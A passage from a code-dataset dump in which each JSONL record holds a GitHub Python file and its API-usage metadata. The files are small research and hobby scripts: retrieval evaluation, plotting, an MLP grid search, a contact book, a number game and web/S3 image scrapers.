"line_number": 184, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 185, "usage_type": "call"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 187, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 187, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 206, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 215, 
"usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 215, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 285, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 300, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 305, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 318, "usage_type": "call"}]}
+{"seq_id": "16945607900", "text": "from beir import util, LoggingHandler\nfrom beir.datasets.data_loader import GenericDataLoader\nfrom beir.retrieval.evaluation import EvaluateRetrieval\n\nimport pathlib, os, csv, random\nimport sys\nimport argparse\nimport logging\n \n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n\ncsv.field_size_limit(sys.maxsize)\n\ndef tsv_reader(input_filepath):\n reader = csv.reader(open(input_filepath, encoding=\"utf-8\"), delimiter=\"\\t\", quoting=csv.QUOTE_MINIMAL)\n for idx, row in enumerate(reader):\n yield idx, row\n\ndef main(dataset, split, data_dir, collection, rankings, k_values):\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n if data_dir == None:\n url = \"https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip\".format(dataset)\n out_dir = os.path.join(pathlib.Path(__file__).parent.absolute(), \"datasets\")\n data_dir = util.download_and_unzip(url, out_dir)\n\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n corpus, queries, qrels = GenericDataLoader(data_folder=data_dir).load(split=split)\n\n inv_map, results = {}, {}\n \n #### Document mappings (from original string to position in tsv file ####\n for idx, row in tsv_reader(collection):\n inv_map[str(idx)] = row[0]\n\n #### Results ####\n for _, row in tsv_reader(rankings):\n qid, doc_id, rank = row[0], row[1], int(row[2])\n if qid != inv_map[str(doc_id)]:\n if qid not in results:\n results[qid] = {inv_map[str(doc_id)]: 1 / (rank + 1)}\n else:\n results[qid][inv_map[str(doc_id)]] = 1 / (rank + 1)\n\n #### Evaluate your retrieval using NDCG@k, MAP@K ...\n evaluator = EvaluateRetrieval()\n ndcg, _map, recall, precision = evaluator.evaluate(qrels, results, k_values)\n mrr = EvaluateRetrieval.evaluate_custom(qrels, results, k_values, metric='mrr')\n\n #### Print top-k documents retrieved ####\n top_k = 10\n\n query_id, ranking_scores = random.choice(list(results.items()))\n scores_sorted = sorted(ranking_scores.items(), key=lambda item: item[1], reverse=True)\n logging.info(\"Query : %s\\n\" % queries[query_id])\n\n # for rank in range(top_k):\n # doc_id = scores_sorted[rank][0]\n # # Format: Rank x: ID [Title] Body\n # logging.info(\"Rank %d: %s [%s] - %s\\n\" % (rank+1, doc_id, corpus[doc_id].get(\"title\"), corpus[doc_id].get(\"text\")))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', type=str, help=\"BEIR Dataset Name, eg. 
nfcorpus\")\n parser.add_argument('--split', type=str, default=\"test\")\n parser.add_argument('--data_dir', type=str, default=None, help='Path to a BEIR repository (incase already downloaded or custom)')\n parser.add_argument('--collection', type=str, help='Path to the ColBERT collection file')\n parser.add_argument('--rankings', required=True, type=str, help='Path to the ColBERT generated rankings file')\n parser.add_argument('--k_values', nargs='+', type=int, default=[1,3,5,10,100])\n args = parser.parse_args()\n main(**vars(args))\n\n", "repo_name": "THUDM/P-tuning-v2", "sub_path": "PT-Retrieval/colbert/colbert/beir_eval.py", "file_name": "beir_eval.py", "file_ext": "py", "file_size_in_byte": 3323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1727, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "beir.LoggingHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.field_size_limit", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 16, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "beir.util.download_and_unzip", "line_number": 28, "usage_type": "call"}, {"api_name": "beir.util", "line_number": 28, "usage_type": "name"}, {"api_name": "beir.datasets.data_loader.GenericDataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 49, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval.evaluate_custom", "line_number": 51, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 51, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "43094156361", "text": "\n'''Guess Number\nhttps://www.reddit.com/r/dailyprogrammer/comments/pii6j/difficult_challenge_1/\n'''\n\n\nimport string\nfrom random import randint\n# Data modeling\nfrom dataclasses import dataclass, field, asdict\nfrom json import dumps as json_dumps\n# Type hints\nfrom typing import List\nfrom numbers import Integral\n\n\n@dataclass\nclass Model:\n '''Class for guess a random number\n '''\n guesses: List = field(default_factory=lambda: [])\n number: int = randint(0, 100)\n guess_range: List[int] = field(default_factory=lambda: [0, 100])\n \n \n def __post_init__(self):\n '''Execute after class initializes\n '''\n while True:\n #print(self)\n # Get user input\n input_message = f'Guess a number between {self.guess_range[0]} and {self.guess_range[1]}: '\n user_input = input(input_message)\n \n # Check if input is a number\n number_check = True\n try:\n user_input = int(user_input)\n self.guesses.append(user_input)\n except:\n number_check = False\n print(f'\"{user_input}\" is not a number. Please try again.')\n \n # Check if the guess is correct\n if number_check:\n if user_input > self.number:\n self.guess_range[1] = user_input\n print(f'The number is less than \"{user_input}\"')\n elif user_input < self.number:\n self.guess_range[0] = user_input\n print(f'The number is greater than \"{user_input}\"')\n elif user_input == self.number:\n print(f'Good guess! \"{self.number}\" is the correct number.') \n break\n \n \nif __name__ == '__main__':\n M = Model()\n print(json_dumps(asdict(M), indent=2))\n", "repo_name": "fjemi/coding_challenges", "sub_path": "challenges/guess_number.py", "file_name": "guess_number.py", "file_ext": "py", "file_size_in_byte": 1646, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 23, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 17, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}, {"api_name": "dataclasses.asdict", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "3300970328", "text": "# %% [markdown]\n# ##\nimport os\nimport time\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.patches import Circle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom scipy.integrate import tplquad\nfrom scipy.special import comb\nfrom scipy.stats import gaussian_kde\nfrom sklearn.metrics import pairwise_distances\n\nimport pymaid\nfrom graspy.utils import pass_to_ranks\nfrom hyppo.ksample import KSample\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import readcsv, savecsv, savefig\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n get_mid_map,\n gridmap,\n matrixplot,\n remove_axis,\n remove_spines,\n set_axes_equal,\n stacked_barplot,\n set_theme,\n)\n\n\n# plotting settings\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n # \"axes.edgecolor\": \"lightgrey\",\n # \"ytick.color\": \"grey\",\n # \"xtick.color\": \"grey\",\n # \"axes.labelcolor\": \"dimgrey\",\n # \"text.color\": \"dimgrey\",\n \"pdf.fonttype\": 42,\n \"ps.fonttype\": 42,\n \"font.family\": \"sans-serif\",\n \"font.sans-serif\": [\"Arial\"],\n}\n\nset_theme(rc_dict=rc_dict, font_scale=1.25)\n\n\nnp.random.seed(8888)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, format=\"png\", dpi=200, **kws)\n savefig(name, foldername=FNAME, save_on=True, format=\"pdf\", dpi=200, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name, foldername=FNAME, **kws)\n\n\n# load data\nmg = load_metagraph(\"G\")\n# mg = mg.reindex(mg.meta[~mg.meta[\"super\"]].index, use_ids=True)\n\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"] # \"Gs\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n # this line is important, to make the graphs aligned\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n\n# %%\n\nfig, ax = plt.subplots(2, 2, figsize=(20, 20))\n\n\n# %% [markdown]\n# ##\n\n# %% [markdown]\n# ## Load the 4-color graphs\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n# %% [markdown]\n# ## Combine them into the 2N graph...\nn_verts = len(adjs[0])\naxon_inds = np.arange(n_verts)\ndend_inds = axon_inds.copy() + n_verts\ndouble_adj = np.empty((2 * n_verts, 2 * n_verts))\ndouble_adj[np.ix_(axon_inds, axon_inds)] = adjs[1] # Gaa\ndouble_adj[np.ix_(axon_inds, dend_inds)] = adjs[0] # Gad\ndouble_adj[np.ix_(dend_inds, axon_inds)] = adjs[3] # Gda\ndouble_adj[np.ix_(dend_inds, dend_inds)] = adjs[2] # Gdd\n# double_adj[axon_inds, dend_inds] = 1000 # make internal edges, make em big\n# double_adj[dend_inds, axon_inds] = 1000\n\naxon_meta = mg.meta.rename(index=lambda x: str(x) + \"_axon\")\naxon_meta[\"compartment\"] = \"Axon\"\ndend_meta = mg.meta.rename(index=lambda x: str(x) + \"_dend\")\ndend_meta[\"compartment\"] = \"Dendrite\"\n\n\ndouble_meta = pd.concat((axon_meta, dend_meta), axis=0)\n\nfig, ax = plt.subplots(1, 1, figsize=(20, 20))\nadjplot(\n double_adj,\n plot_type=\"scattermap\",\n 
sizes=(1, 1),\n ax=ax,\n meta=double_meta,\n sort_class=[\"compartment\"],\n item_order=[\"merge_class\", \"pair_id\"],\n colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n)\nstashfig(\"double-adj\")\n\n\n#%%\nfig, axs = plt.subplots(2, 2, figsize=(20, 20), gridspec_kw=dict(hspace=0, wspace=0))\nmatrixplot_kws = dict(\n row_meta=mg.meta,\n col_meta=mg.meta,\n row_item_order=[\n \"merge_class\",\n \"pair_id\",\n ], # TODO maybe pick whatever we do in next figure\n col_item_order=[\"merge_class\", \"pair_id\"],\n # colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n sizes=(1, 1),\n plot_type=\"scattermap\",\n)\n\nedge_type_palette = dict(zip(graph_types, sns.color_palette(\"deep\")))\n\nax = axs[0, 0]\nmatrixplot(adjs[1], ax=ax, color=edge_type_palette[\"Gaa\"], **matrixplot_kws)\nax.set(ylabel=\"Axon\", title=\"Axon\")\n\nax = axs[0, 1]\nmatrixplot(adjs[0], ax=ax, color=edge_type_palette[\"Gad\"], **matrixplot_kws)\nax.set(title=\"Dendrite\")\n\nax = axs[1, 0]\nmatrixplot(adjs[3], ax=ax, color=edge_type_palette[\"Gda\"], **matrixplot_kws)\nax.set(ylabel=\"Dendrite\")\n\nax = axs[1, 1]\nmatrixplot(adjs[2], ax=ax, color=edge_type_palette[\"Gdd\"], **matrixplot_kws)\nstashfig(\"4-color-adjplot\")", "repo_name": "neurodata/maggot_models", "sub_path": "notebooks/172.0-BDP-plot-4-color.py", "file_name": "172.0-BDP-plot-4-color.py", "file_ext": "py", "file_size_in_byte": 4615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.visualization.set_theme", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "src.io.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "src.io.savefig", "line_number": 70, "usage_type": "call"}, {"api_name": "src.io.savecsv", "line_number": 74, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 78, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "src.data.load_metagraph", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "src.visualization.adjplot", "line_number": 133, "usage_type": "call"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": 
"src.visualization.CLASS_COLOR_DICT", "line_number": 158, "usage_type": "name"}, {"api_name": "seaborn.color_palette", "line_number": 163, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 166, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 170, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 174, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 178, "usage_type": "call"}]}
+{"seq_id": "31804258640", "text": "\"\"\"\nImplementation notes:\n • Since assignment guidelines did not specify the amount of max iterations, the default of 200 is given. MLP will therefore not converge\n • We use the training set to tune the hyperparameters, because the GridSearchCV library functions based on cross-validation. It can therefore\n only take in 1 dataset. Since the training set has more data, it is best to use it instead of the validation set.\n\"\"\"\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom utils import split_feats_targs, capture_features, capture_targets,export_results\n\n(train_features, train_targets) = split_feats_targs('train_1.csv') # pass training set with targets\ntest_features = capture_features('test_no_label_1.csv', False) # pass test set without targets\nactual_targets = capture_targets('test_with_label_1.csv') # pass test set with targets\n\n\"\"\"\nParameter options to tune:\n • activation function: sigmoid, tanh, relu and identity\n • 2 network architectures of your choice: for eg 2 hidden layers with 30+50 nodes, 3 hidden layers with 10+10\n • solver: Adam and stochastic gradient descent\n\"\"\"\n\nprint(\"Finding best hyperparameters for MLP....\")\nbest_mlp = GridSearchCV(MLPClassifier(), {\n 'activation': ['identity', 'logistic', 'tanh', 'relu'],\n 'hidden_layer_sizes': [(30,50), (10,10,10)],\n 'solver': ['sgd', 'adam']\n}, return_train_score = False, n_jobs = -1)\n\nbest_mlp.fit(train_features, train_targets)\nbest_params = best_mlp.best_params_ # records best found params from gridsearch\nprint(\"Best hyperparameters for MLP:\")\nprint(best_params)\nprint(\"\\n\")\n\nbest_mlp = MLPClassifier(activation=best_params['activation'],hidden_layer_sizes=best_params['hidden_layer_sizes'] ,solver=best_params['solver'])\nfitted_mlp = best_mlp.fit(train_features, train_targets) # fits model with training set values\npredicted_targets = list(fitted_mlp.predict(test_features)) # gets predictions from model and record them\nexport_results(actual_targets, predicted_targets, 'Best-MLP-DS1.csv')\n", "repo_name": "KonstH/comp472-a1", "sub_path": "dataset1/Best_MLP.py", "file_name": "Best_MLP.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.split_feats_targs", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.capture_features", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.capture_targets", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.export_results", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "5426024532", "text": "import xarray\nimport numpy\nimport matplotlib.pyplot as plt\n\nt = 0.01\nr = 0.75\n\nif __name__ == \"__main__\":\n value = [[1, 4, 2, 9], [2, 7, 6, 1], [6, 3, 5, 8], [3, 2, 2, 1]]\n plt.imshow(value)\n plt.show()\n ds = xarray.Dataset(\n data_vars={\n \"v\": (\n (\"x\", \"y\"),\n value,\n ),\n },\n coords={\"x\": [0.0, 0.75, 1.5, 2.25], \"y\": [3.0, 2.25, 1.5, 0.75]},\n )\n ds_xs = ds[\"x\"]\n ds_ys = ds[\"y\"]\n ds_xs = numpy.array(ds_xs)\n n_xs = numpy.arange(ds_xs[0]-r/2, ds_xs[len(ds_xs)-1] + r/2, t)\n n_ys = numpy.arange(ds_ys[0]+r/2, ds_ys[len(ds_ys)-1] - r/2, -t)\n n_ds = ds.interp(x=n_xs, y=n_ys, method=\"nearest\", kwargs={\"fill_value\": \"extrapolate\"})\n plt.imshow(n_ds[\"v\"])\n plt.show()\n # print(n_ds[\"v\"])", "repo_name": "Bosh0113/MISR_AHI", "sub_path": "AHI_AC/test/test_interp.py", "file_name": "test_interp.py", "file_ext": "py", "file_size_in_byte": 798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "xarray.Dataset", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "23214018126", "text": "from PyQt5.QtWidgets import QWidget\nfrom PyQt5.uic import loadUi\n\n\nclass MyWidget(QWidget):\n def __init__(self, uiFile, parent):\n # Se non funziona lo scroll di un qualsiasi scroll area + layout, devi stattare MIN/MAX\n # sulla form contenente il widget!!\n super().__init__(parent)\n loadUi(uiFile, self)\n for bigButton in list(filter(lambda el: 'icon' in el.lower(), self.__dict__.keys())):\n getattr(self, bigButton).setMargin(10)\n", "repo_name": "MrPio/MuseoOmero-Python", "sub_path": "frontend/view/my_widget.py", "file_name": "my_widget.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "39708960869", "text": "import sqlite3\nimport uuid\n\nif __name__ == \"__main__\":\n\n print(\"MENU\")\n print(\"1. Insert new contact\")\n print(\"2. View all contact\")\n print(\"3. Search contact\")\n choice = int(input(\"Enter choice: \"))\n\n conn = sqlite3.connect('contact.db')\n cursor = conn.cursor()\n\n # check if table person exists\n # conn.execute(\"DROP TABLE PERSON\")\n try:\n conn.execute('''CREATE TABLE PERSON\n (ID TEXT PRIMARY KEY,\n NAME TEXT NOT NULL,\n NUMBER TEXT NOT NULL);''')\n print(\"Table created successfully\")\n\n except Exception as e:\n print(e)\n\n if choice == 1:\n nextId = str(uuid.uuid4())\n print(type(nextId))\n name = input(\"Name: \")\n number = input(\"Number: \")\n cursor.execute(\"insert into PERSON (ID, NAME, NUMBER) values (?, ?, ?)\",\n (nextId, name, number))\n conn.commit()\n print(\"Records created successfully\")\n\n elif choice == 2:\n data = conn.execute(\"SELECT id, name, number FROM PERSON\")\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n elif choice == 3:\n print(\"1. Search by name\")\n print(\"2. Search by number\")\n choice = int(input(\"Enter choice: \"))\n if choice == 1:\n name = input(\"Name: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE name =?\", (name,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n elif choice == 2:\n number = input(\"Number: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE number =?\", (number,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n conn.close()\n", "repo_name": "shafiq97/Python-Beginner-Project", "sub_path": "Contact Book.py", "file_name": "Contact Book.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "24219655687", "text": "# -*- coding:utf-8 -*-\nimport requests\nfrom lxml import etree\nimport os\n\nstart_urls = ['http://www.szpb.gov.cn/xxgk/qt/tzgg/index.htm']\nfor i in range(1, 41):\n start_urls.append('http://www.szpb.gov.cn/xxgk/qt/tzgg/index_' + str(i) + '.htm')\n\nfor url in start_urls:\n print(url)\n page_req = requests.get(url)\n html = page_req.text.encode('iso-8859-1').decode('gbk')\n selector = etree.HTML(html, parser=None, base_url=None)\n contents = selector.xpath('//span[contains(text(), \"节能\")][contains(text(), \"2015\")][contains(text(), \"项目公示\")][contains(@class, \"p_bt\")]/../@href')\n # if os.path.isfile('result.txt'):\n # os.remove(\"result.txt\")\n for text in contents:\n with open(\"result.txt\", \"a\") as file :\n link = 'http://www.szpb.gov.cn/xxgk/qt/tzgg/' + text.replace(\"./\", \"\")\n file.write(link + '\\n')", "repo_name": "ichsonx/fgwspider", "sub_path": "fgw.py", "file_name": "fgw.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "72701440169", "text": "'''\nScrape.py is the main scraper.\n\nIt scrapes the S3 Bucket XML, parses it, and navigates\nto each key. It attempts to download and pare the key\nof each file, skipping the key when it fails.\n\nIt uses an port of the Python Image Library to process\nbinary data retrieved from the S3 bucket. It then uses\nthe local db module to store the metadata and EXIF data\nof the image in the database.\n\nCurrently, it is tightly coupled to the waldo-recruting\nS3 bucket, and could use a layer of abstraction around\nimage locations.\n'''\n\n#Standard library modules\nimport time\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\nfrom os.path import splitext\n\n#Dependency modules\nimport requests\nfrom PIL import Image, ExifTags\n\n#Local modules\nfrom db import ImageDatabase as ID\n\nS3_DOCS = '{http://s3.amazonaws.com/doc/2006-03-01/}'\nBUCKET_URL = 'http://s3.amazonaws.com/waldo-recruiting'\n\n#Downloads the images from the S3 bucket\ndef run():\n #Setup database\n db = ID()\n db.setup()\n\n resp = requests.get(BUCKET_URL)\n bucket_result = ET.fromstring(resp.text)\n contents_elems = bucket_result.findall('%sContents' % S3_DOCS)\n for e in contents_elems:\n filename = e.find('%sKey' % S3_DOCS).text\n print('Inserting ', filename)\n url = \"%s/%s\" % (BUCKET_URL, filename)\n try:\n photo = Image.open(BytesIO(requests.get(url).content))\n except OSError as e:\n print(filename, ' failed to open. Skipping...')\n continue\n\n photo_id = db.insert_photo(\n url,\n filename,\n splitext(filename)[1],\n photo.height,\n photo.width\n )\n try:\n photo_exif = photo._getexif()\n except AttributeError as ae:\n print(filename, \"has no exif data. Keeping image and skipping exif\")\n continue\n for tag_no, value in photo_exif.items():\n try:\n tag_name = ExifTags.TAGS[tag_no]\n except KeyError as ke:\n print(\"Exif tag not recognized. Skipping...\")\n continue\n \n #Bad values are currently being skipped. A future improvement\n #could handle bad values more gracefully by working with\n #database schema improvements to work with specific data\n #more directly.\n print(\"Adding\", tag_name, \"to photo\", photo_id, \"-\", value)\n try:\n db.insert_exif(photo_id, tag_no, ExifTags.TAGS[tag_no], value)\n except ValueError as ve:\n print(tag_name, \"had a bad value. 
